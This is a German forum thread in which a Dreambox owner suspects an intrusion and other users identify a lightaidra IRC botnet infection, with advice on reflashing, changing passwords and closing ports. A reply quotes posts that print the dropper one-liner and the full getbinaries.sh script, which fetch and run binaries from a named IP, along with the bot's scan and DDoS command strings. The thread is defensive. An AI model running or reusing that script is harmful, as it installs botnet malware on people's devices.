Dreambox hacked?

[cs-]

Hallo zusammen,

Ich habe das Gefühl, dass sich jemand Zugang zu meiner Dreambox verschafft hat. U.a läuft ein Prozess /var/run/m..ipsel in mehrfacher Ausführung, der mir vorher nie aufgefallen ist.. Über Google konnte ich hierzu nichts finden.

Kann jemand mir etwas hierzu sagen? Oder wie ich am besten überprüfen kann, ob alles i. O. Ist?

Danke & Gruß

 

[Bodo-1]

Paar mehr Infos benötigen wir schon !

Inet cs ?

Ports nach außen offen ?
Welches Image ?

Oscam ?

Sonst kann dir keiner vernünftig helfen .


Gruß Bodo


Sent from my iPhone using Tapatalk

 

[cs-]

AW: Dreambox hacked?

Sorry, Die Box ist ans Internet angeschlossen und im Wesentlichen im Auslieferungszustand. Zwischenzeitlich hatte ich den Telnet Port zu Konfigurationszwecken offen. Das Passwort hatte ich natürlich zuvor geändert. Oscam 1.20 ist installiert. Enigma2 ebenfalls.. genaue Versionen kann ich erst durch geben, wenn ich wieder zu Hause bin. Habe die Box jetzt zunächst vom Netz genommen

 

[Bodo-1]

AW: Dreambox hacked?

Zu dem Prozess kann ich dir auch so nix sagen , da ich auch Nicht Zuhause bin !

Evtl meldet sich gleich jemand der nachschauen kann .

Gruß Bodo


Sent from my iPhone using Tapatalk

 

[un4given]

AW: Dreambox hacked?

Da war mal was mit den Boxen.. es ging um das Standart Passwort, wenn du sicher sein willst das alles ok ist hilft nur neu Flashen und neues Passwort vergeben.

 

[iceman75]

AW: Dreambox hacked?

Öffne nie Standard Port um Zugang zu deiner Dream zu erhalten!
Ich empfehle immer alles über eine sichere VPN Verbindung zu machen.

 

[janni1]

AW: Dreambox hacked?

Hi,
heißt der Prozess wirklich /var/run/m..ipsel oder hast du da was gekürzt?
Es sieht fast so aus als ob es dich wirklich erwischt hat.
Könntest du mal bitte die Ausgabe von

cat .ash_history

posten?
Könntest du mir diese Datei (m..ipsel) mal schicken?

Das könnte ein Bot zu sein,

Hier mal was aus einem türkischen Forum, leider nur mit Google übersetzt.

Spoiler

Dreambox Hack

Slm Freunde,

Ich bemerkte gestern, dass meine Dreambox 7020HD hacklandig. Ich möchte Sie warnen, dass für sie.

Wie Hack ist aufgetreten:
In diesen späten Router Telnet / FTP weitergeleitet Port've die Tat und Dreambox. Dreambox Passwort für das neue, dass ich nicht geändert haben. Ist der Zustand, den ich vergessen, den Hafen nach zu schließen. Blieb für etwa eine Woche geöffnet.

Wie man bemerkt, dass Hajj:
In den letzten Tagen wurde mein Router installiert und fing an, richtig und Dreambox gehen. Ich dachte, ich würde ihn zu suchen, und ein bisschen between'm über Telnet Majors gebunden. Wasser würde meine Aufmerksamkeit auf sich ziehen:

Code:

      rm-rf / var / run / getbinaries.sh;  http://108.166.187.75/getbinaries.sh wget-c-P / var / run && sh / var / run / getbinaries.sh &

Was ist sie denn diesen Befehl ein:
/ Var / run / Ordner getbinaries.sh Löschen der Datei, dann über IP 108.166.187.75 mit wget Befehl zum Download der neue / var / run in einem Ordner zu speichern. Schließlich läuft.

Offensichtlich untersuche ich den Befehl wget für diese Datei, die ich heruntergeladen. Sagen icerg der Datei:

Code:

      #!/bin/sh
 # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
 # UPLOAD GETBINARIES.SH IN YOUR HTTPD.

 # YOUR HTTPD SERVER:
 REFERENCE_HTTP="http://108.166.187.75"


 # NAME OF BINARIES:
 REFERENCE_MIPSEL="mipsel"
 REFERENCE_MIPS="mips"
 REFERENCE_SUPERH="sh"
 REFERENCE_ARM="arm"
 REFERENCE_PPC="ppc"

 rm -fr /var/run/${REFERENCE_MIPSEL} \
  /var/run/${REFERENCE_MIPS} \
  /var/run/${REFERENCE_SUPERH} \
  /var/run/${REFERENCE_ARM} \
  /var/run/${REFERENCE_PPC}

 wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
 wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
 wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
 wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
 wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}

 sleep 3;
 rm -fr /var/run/getbinaries.sh

Dies ist, was das Skript tut:
Kurz gesagt, wird die fünfte Datei herunterladen 108.166.187.75 IPD (mipsel, MIPS, SH, Arm-und ppc), dann / var / / Ordner ausgeführt wird versuchen, auszuführen. Namen bereits auf. Ln-Dateien mit dem Befehl Datei:

Code:

arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
 mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
 mipsel: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
 ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
 sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped

Natürlich Dreambox 7020HD mipsel (little-endian) ist, dass für die mipsel hatte Datei geschult.

Mit den Befehlsfolgen in dieser Datei suchen 7020hd'y meine Dreambox baute dieses Boot bemerkte er:

Kleine Teile der Befehlszeichenfolgen:

Code:

       PRIVMSG %s :* *** Access Commands:
 PRIVMSG %s :*
 PRIVMSG %s :* .login <password> - login to bot's party-line
 PRIVMSG %s :* .logout - logout from bot's party-line
 PRIVMSG %s :* *** Miscs Commands
 PRIVMSG %s :* .exec <commands> - execute a system command
 PRIVMSG %s :* .version - show the current version of bot
 PRIVMSG %s :* .status - show the status of bot
 PRIVMSG %s :* .help - show this help message
 PRIVMSG %s :* *** Scan Commands
 PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (AB) classes sets by you
 PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
 PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (CD) classes random
 PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
 PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (AB) classes random
 PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
 PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
 PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
 PRIVMSG %s :* .stop - stop current operation (scan/dos)
 PRIVMSG %s :* *** DDos Commands:
 PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
 PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
 PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
 PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
 PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
 PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
 PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
 PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
 PRIVMSG %s :* *** IRC Commands:
 PRIVMSG %s :* .setchan <channel> - set new master channel
 PRIVMSG %s :* .join <channel> <password> - join bot in selected room
 PRIVMSG %s :* .part <channel> - part bot from selected room
 PRIVMSG %s :* .quit - kill the current process
 PRIVMSG %s :* *** EOF
 JOIN %s :%s
 PING 0313370
 PRIVMSG %s :[logout] you are logged out!, (%s).
 %*s%*s%*s%*s%255[^
 PRIVMSG %s :[!exec] error on command: %s
 (NULL)
 PRIVMSG %s :[exec] result of "%s":
 PRIVMSG %s :%s
 PRIVMSG %s :[version] lightaidra 0x2012.
 PRIVMSG %s :[status] currently not working.
 PRIVMSG %s :[status] working on %s
 PRIVMSG %s :[spoof] spoofing set as random ip!
 PRIVMSG %s :[error] one error in your input data, see help!
 PRIVMSG %s :[spoof] spoofing set as ip: %s
 advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)
 advscan scanning range %s.%s.0.0/16
 PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..
 PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..
 PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16.  wait..
 PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s).  wait..
 PRIVMSG %s :[stop] %s was stopped!
 operation
 QUOTE ZOMBIE
 PRIVMSG %s :[chan] %s setted as master channel.
 PART %s :%s
 Aidra?!
 QUIT :pwn!
 synflood packeting %s:%u (secs: %u)
 PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
 ngsynflood packeting %s:%u (secs: %u)
 PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
 ackflood packeting %s:%u (secs: %u)
 PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
 ngackflood packeting %s:%u (secs: %u)
 PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
 /var/run/.lightscan
 PRIVMSG %s :[error] unable to open: %s

Befehlszeichenfolgen für Freunde, die forschen wollen strings.txt ich die Datei zu laden.

So löschen Sie, was Sie tun musst in Hajj:

Natürlich Telnet / FTP-Ports zu schließen. Dann wird der Befehl ps mit der / var / run / mipsel-ID zu töten, um zu lernen und das Programm mit ID schließen. Schließlich rm / var / run / mipsel löschen. Natürlich habe ich nicht den Code des Programms in seiner Gesamtheit kennen, denn ich habe nicht genug zu wissen, zu löschen. Für eine ulasdig zu Ihrem Netzwerk, natürlich gibt es eine weitere Möglichkeit, in das System eingeben. Aber das Programm ist auch nicht in ihrer bulasiyorm anderen Systemen.

hier mal was aus dem IhaD:

Spoiler

[TABLE="class: tablea_fc, width: 100%"]
[TR]
[TD] Dreambox Virus / Bot entdeckt![/TD]
[TD="align: right"][/TD]
[/TR]
[/TABLE]

---

Hab da was krasses erlebt heute ... wusste gar nicht das es sowas gibt

Mein Kumpel hatte Tagelang probleme mit seiner dreambox. jeden tag gecrasht und danach waren irgendwelche dateien ausgetauscht und enigma startete nicht mehr. Musste immer neu flashen und nächsten Tag ging wieder nix.

Hab ihm dann heute mal geholfen und rausgefunden das seine box permanent im internet erreichbar war weil er portfreigabe gemacht hat für telnet und ftp damit er von der arbeit und so auf die box kommt. Leider standard username/passwort mit root/dreambox.

Eben war seine box wieder hinüber. Konnte dann im aktivieren FTP und Telnet Log auf seiner Box sehen das sich einer eingeloggt hat auf der box aus polen, ein paar files auf die box kopiert hat und irgendnen unfug gemacht hat.

Konnte lustigerweise die IP selber im browser und ftp erreichen mit standard root/dreambox login, war eine ENIGMA1 Box ...

Auf dieser fremden box lief ein prozess names "m5" das wohl permanent irgendwelche internet ip ranges gescannt hat und probiert hat sich dort mit root/dreambox einzuloggen und wenn login erfolgreich, dann wurde der bot auch da installiert und ein paar libs ausgetauscht die den bot starten. Diese Box hat dann wohl jeden Tag meinen Kumpel probiert zu infizieren und den bot zu installieren.

Da es LIBS sind für enigma1 crashte aber die box von meinem kumpel immer weil die für POWERPC und nich MIPSEL kompiliert sind ...

Kann in dem kompilierten "m5" binary nich viel erkennen, aber es ist aufjedenfall nen BOT der IP's scannt und sich dann probiert damit zu verbreiten.

Aber da sind ein paar text strings zu erkennen die klar drauf hindeuten das es sich um einen bot handelt, befehle wie DDOS, IP Scans usw usw.

[TABLE="width: 98%, align: center"]
[TR]
[TD] [TABLE="class: tableinborder, width: 100%"]
[TR="class: smallfont"]
[TD="class: tablecat, colspan: 2"]code:[/TD]
[/TR]
[TR="class: smallfont"]
[TD="class: inposttable, align: right"]1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:[/TD]
[TD="class: inposttable, align: left"]PRIVMSG %s :* .login <password> - login to bot's party-line
PRIVMSG %s :* .logout - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with userass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with userass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with userass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with userass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process[/TD]
[/TR]
[/TABLE]
[/TD]
[/TR]
[/TABLE]


Der prozess lief auf der box aus polen dutzende mal und hatte dutzende aktivie Internet verbindungen .... war also fleissig dabei fremde boxen im internet zu suchen wo man sich mit root/dreambox einloggen konnte. Und wenn das gelang wurden ein paar dateien ausgetauscht ... schlecht für enigma2 boxen das es sich dabei um powerpc libs handelt udn danach gar nix mehr geht.

Hab mir die Bot Binaries mal geladen und gezippt, vlt kann da ja einer was mit anfangen aber vorsicht!!!

Find ich krass ... wusste gar nich das es dreambox viren gibt. Zugegeben eine Box im internet zu haben ohne passwort bzw. mit standard root/dreambox login is nicht gerade schlau, aber das es Bots gibt die solche dreamboxen suchen und infizieren finde ich schon krass!!!

Guß
janni1

 

[mxer]

AW: Dreambox hacked?

Ein bischen mehr an Sicherheit denken, wäre schon sinnvoll.
Z.B. keine Standart Ports, Namen PWD etc. nehmen, auch dann, wenn es für Neueinsteiger nicht so einfach ist.
Auch sollte man nur per SSL auf die Dream gehen, wenn man von außerhalb zugreifen will.

Außerdem sollte man prinzipiell jeden gebraucht gekauften Reci zurücksetzen und ein anderes Image draufmachen.
Am Besten, bevor man die ins Internet hängt.
Es kann viel auf dem Ding installiert sein, ob beabsichtigt oder nicht, ist dabei völlig egal.

Gab schon mehrere User, die auf einmal irgendwelche Zugriffe vermerkten, die sie nicht zuordnen konnten.
Hinterher stellte sich eben heraus, daß sie mit der vor-installierten Software losgelegt hatten.
Das betrifft also nicht nur gebrauchte, auch in einem Geschäft kann man da was machen.
Vor allem, wenn man das Teil nicht von einem Händler aus DE gekauft hat.

Paranoid oder nicht - sicher ist sicher :good:

 

[cs-]

AW: Dreambox hacked?

Hi! Sorry für die verspätete Rückmeldung. Habe die Box mittlerweile neu aufgesetzt und selbstverständlich alle Passwörter etc. geändert. Danke für eure Hilfe!

@janni1: Der Prozess hieß wirklich so. Schicken kann ich dir die Datei leider nicht. Nachdem ich die Box neugestartet habe, konnte ich die Datei komischerweise nicht mehr auffinden.